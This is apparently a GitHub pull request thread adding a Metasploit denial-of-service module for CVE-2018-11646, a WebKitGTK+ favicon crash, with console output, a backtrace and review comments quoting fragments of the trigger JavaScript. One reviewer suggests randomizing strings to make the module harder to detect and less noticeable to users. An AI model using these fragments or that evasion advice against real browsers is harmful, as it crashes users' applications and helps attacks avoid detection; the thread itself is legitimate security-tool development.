WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646
rapid7/metasploit-framework pull request #10156
Opened 2018-06-09 06:15 UTC by RootUp

## Summary 

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash. 

**Tested on** :  `Epiphany Web Browser 3.28.x`

## Verification 
```
msf auxiliary(dos/http/webkitplus) > show options 

Module options (auxiliary/dos/http/webkitplus):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.105    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer

msf auxiliary(dos/http/webkitplus) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(dos/http/webkitplus) > 
[*] Using URL: http://192.168.1.105:8080/
[*] Server started.

msf auxiliary(dos/http/webkitplus) > 
[*] Sending response

msf auxiliary(dos/http/webkitplus) >
```

**Backtrace using Fedora 27** 

```
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432 
```

**References:** 
https://bugs.webkit.org/show_bug.cgi?id=186164
https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html

2018-06-09 06:34 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +win = window.open("sleep_one_second.php", "WIN");
What is `sleep_one_second.php` ?

2018-06-09 06:34 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +window.open("https://www.paypal.com", "WIN");
Can this be randomised? Does it need to be a real URL? If so, it should be configurable.

2018-06-09 06:34 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +win.document.write("Spoofed URL");
Is this necessary? If so, is `win.document.write('');` sufficient?

2018-06-09 06:34 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +        'Name'           => "WebKitGTK+ leading to an application crash [DoS]",
Perhaps: `WebKitGTK+ WebKitFaviconDatabase DoS`

2018-06-09 06:34 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +          ['EXPLOIT-DB', '44842'],
`EDB`

2018-06-09 06:34 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +        'DisclosureDate' => 'June 03 2018',
'Jun 3 2018`

2018-06-09 06:44 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +window.open("https://www.paypal.com", "WIN");
Alternatively, can the URL point back to the MSF HTTP server?

2018-06-09 06:46 UTC, RootUp commented on modules/auxiliary/dos/http/webkitplus.rb
> +win = window.open("sleep_one_second.php", "WIN");
What i observed is that can be anything example `hello_world.php` or `WIN`

2018-06-09 06:47 UTC, RootUp commented on modules/auxiliary/dos/http/webkitplus.rb
> +window.open("https://www.paypal.com", "WIN");
URL is not necessary though, it can be configurable or simply we can change it to `WIN`

2018-06-09 06:48 UTC, RootUp commented on modules/auxiliary/dos/http/webkitplus.rb
> +win.document.write("Spoofed URL");
Not sure about this, but looks sufficient specifically to execute crash in WebkitGTK+

2018-06-10 03:02 UTC, timwr commented
Great stuff @RootUp 
You might also be interested in: https://github.com/MTJailed/MSF-Webkit-10.3

2018-06-10 06:13 UTC, RootUp commented
Thanks @timwr 
Never came across that repo, but will surely have a look.

2018-06-11 03:20 UTC, bcoles commented on documentation/modules/auxiliary/dos/http/webkitplus.md
> +This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and w
```
This module exploits a vulnerability in `WebKitFaviconDatabase` when `pageURL` is unset.
If successful, it could lead to application crash, resulting in denial of service.

The `webkitFaviconDatabaseSetIconForPageURL` and `webkitFaviconDatabaseSetIconURLForPageURL`
functions in `UIProcess/API/glib/WebKitFaviconDatabase.cpp` in WebKit, as used in WebKitGTK+
through 2.21.3, mishandle an unset `pageURL`, leading to an application crash.
```

2018-06-11 03:20 UTC, bcoles commented on documentation/modules/auxiliary/dos/http/webkitplus.md
> +Related links :
```
Related links : 
* https://bugs.webkit.org/show_bug.cgi?id=186164
* https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html
```

2018-06-11 03:20 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +          If successful,it could leads to application crash, denial of service.
`If successful, it could lead to application crash, resulting in denial of service.`

2018-06-11 03:20 UTC, bcoles commented on modules/auxiliary/dos/http/webkitplus.rb
> +win.document.write("Spoofed URL");
Hardcoded strings like `Spoofed URL` and `sleep_one_second.php` make the code easier to detect and prevent. They also increase the chances of the user realising something suspicious is afoot, in the event they're using a non-vulnerable browser that doesn't crash. These should be randomized where possible.

Similarly, PayPal probably aren't keen on being used as the default URL (free advertising?). The URL should point elsewhere if possible.

2018-06-11 08:01 UTC, RootUp commented
Thanks @bcoles 😎
I have made the necessary changes 👍

2018-06-13 20:43 UTC, acammack-r7 requested changes
Minor changes

2018-06-13 20:43 UTC, acammack-r7 commented on modules/auxiliary/dos/http/webkitplus.rb
> +
This also needs to
```ruby
include Msf::Auxiliary::Dos
```
to avoid being unintentionally run by Pro and other tools.

2018-06-14 13:14 UTC, acammack-r7 approved these changes

2018-06-21 21:31 UTC, busterb commented
WFM, thanks @RootUp !

2018-06-21 21:32 UTC, merged

2018-06-21 21:35 UTC, busterb commented
## Release Notes

This adds an DoS module for CVE-2018-11646, exploiting a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it can cause a crash in applications using a vulnerable version of WebKitGTK+ up to version 2.21.3.